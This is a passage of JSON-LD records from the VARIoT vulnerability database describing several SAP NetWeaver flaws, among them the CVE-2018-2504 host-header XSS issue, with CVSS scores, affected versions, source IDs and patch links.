"id": "cc225a46-1f5a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-4343"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "cc225a46-1f5a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-4343"
}
]
},
"last_update_date": "2022-05-17T01:46:38.682000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP Netweaver \u0027SAPHostControl\u0027 service remote code execution vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/20051"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-4343"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://www.contextis.com/research/blog/sap4/http"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/55084"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-4343"
},
{
"db": "BID",
"id": "55084"
},
{
"db": "CNNVD",
"id": "CNNVD-201210-665"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "cc225a46-1f5a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-4343"
},
{
"db": "BID",
"id": "55084"
},
{
"db": "CNNVD",
"id": "CNNVD-201210-665"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-08-21T00:00:00",
"db": "IVD",
"id": "cc225a46-1f5a-11e6-abef-000c29c66e3d"
},
{
"date": "2012-08-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-4343"
},
{
"date": "2012-08-16T00:00:00",
"db": "BID",
"id": "55084"
},
{
"date": "2012-08-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201210-665"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-08-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-4343"
},
{
"date": "2013-05-10T11:52:00",
"db": "BID",
"id": "55084"
},
{
"date": "2012-10-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201210-665"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201210-665"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver \u0027SAPHostControl\u0027 Service Remote Code Execution Vulnerability",
"sources": [
{
"db": "IVD",
"id": "cc225a46-1f5a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-4343"
},
{
"db": "BID",
"id": "55084"
}
],
"trust": 1.1
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "55084"
}
],
"trust": 0.3
}
}
var-201011-0409
Vulnerability from variot
SAP NetWeaver is prone to a local privilege-escalation vulnerability. Local attackers may exploit this issue to gain elevated privileges, which can lead to a complete compromise of an affected computer.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201011-0409",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "44836"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP",
"sources": [
{
"db": "BID",
"id": "44836"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to a local privilege-escalation vulnerability.\nLocal attackers may exploit this issue to gain elevated privileges, which can lead to a complete compromise of an affected computer.",
"sources": [
{
"db": "BID",
"id": "44836"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "44836",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "44836"
}
]
},
"id": "VAR-201011-0409",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:48:44.976000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.3,
"url": " https://service.sap.com/sap/support/notes/1525695"
}
],
"sources": [
{
"db": "BID",
"id": "44836"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "44836"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-11-12T00:00:00",
"db": "BID",
"id": "44836"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-11-12T00:00:00",
"db": "BID",
"id": "44836"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "BID",
"id": "44836"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver \u0027Function Builder\u0027 Local Privilege Escalation Vulnerability",
"sources": [
{
"db": "BID",
"id": "44836"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "44836"
}
],
"trust": 0.3
}
}
var-201812-0567
Vulnerability from variot
SAP NetWeaver AS Java Web Container service does not validate against whitelist the HTTP host header which can result in HTTP Host Header Manipulation or Cross-Site Scripting (XSS) vulnerability. This is fixed in versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. SAP NetWeaver AS Java 7.10 ,7.11, 7.20, 7.30, 7.31, 7.40 and 7.50 are vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201812-0567",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.11"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.11"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.11"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.10"
}
],
"sources": [
{
"db": "BID",
"id": "106150"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013044"
},
{
"db": "NVD",
"id": "CVE-2018-2504"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-479"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2504"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "106150"
}
],
"trust": 0.3
},
"cve": "CVE-2018-2504",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-2504",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-2504",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-2504",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201812-479",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013044"
},
{
"db": "NVD",
"id": "CVE-2018-2504"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-479"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS Java Web Container service does not validate against whitelist the HTTP host header which can result in HTTP Host Header Manipulation or Cross-Site Scripting (XSS) vulnerability. This is fixed in versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50. \nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. \nSAP NetWeaver AS Java 7.10 ,7.11, 7.20, 7.30, 7.31, 7.40 and 7.50 are vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2504"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013044"
},
{
"db": "BID",
"id": "106150"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-2504",
"trust": 2.7
},
{
"db": "BID",
"id": "106150",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013044",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201812-479",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "106150"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013044"
},
{
"db": "NVD",
"id": "CVE-2018-2504"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-479"
}
]
},
"id": "VAR-201812-0567",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:28:35.434000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Patch Day - December 2018",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=508559699"
},
{
"title": "SAP NetWeaver AS Java Web Container service Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=87727"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013044"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-479"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013044"
},
{
"db": "NVD",
"id": "CVE-2018-2504"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=508559699"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/106150"
},
{
"trust": 1.6,
"url": "https://launchpad.support.sap.com/#/notes/2718993"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-2504"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-2504"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2718993"
}
],
"sources": [
{
"db": "BID",
"id": "106150"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013044"
},
{
"db": "NVD",
"id": "CVE-2018-2504"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-479"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "106150"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013044"
},
{
"db": "NVD",
"id": "CVE-2018-2504"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-479"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-12-11T00:00:00",
"db": "BID",
"id": "106150"
},
{
"date": "2019-02-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-013044"
},
{
"date": "2018-12-11T22:29:00.640000",
"db": "NVD",
"id": "CVE-2018-2504"
},
{
"date": "2018-12-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201812-479"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-12-11T00:00:00",
"db": "BID",
"id": "106150"
},
{
"date": "2019-02-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-013044"
},
{
"date": "2021-04-21T12:30:32.197000",
"db": "NVD",
"id": "CVE-2018-2504"
},
{
"date": "2021-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201812-479"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201812-479"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS Java Web Container Service cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013044"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-479"
}
],
"trust": 1.4
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201812-479"
}
],
"trust": 0.6
}
}
var-201707-1365
Vulnerability from variot
SAP Netweaver Data Orchestration Engine is prone to an unspecified information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201707-1365",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "99529"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported the issue.",
"sources": [
{
"db": "BID",
"id": "99529"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver Data Orchestration Engine is prone to an unspecified information-disclosure vulnerability.\nAttackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.",
"sources": [
{
"db": "BID",
"id": "99529"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "99529",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "99529"
}
]
},
"id": "VAR-201707-1365",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
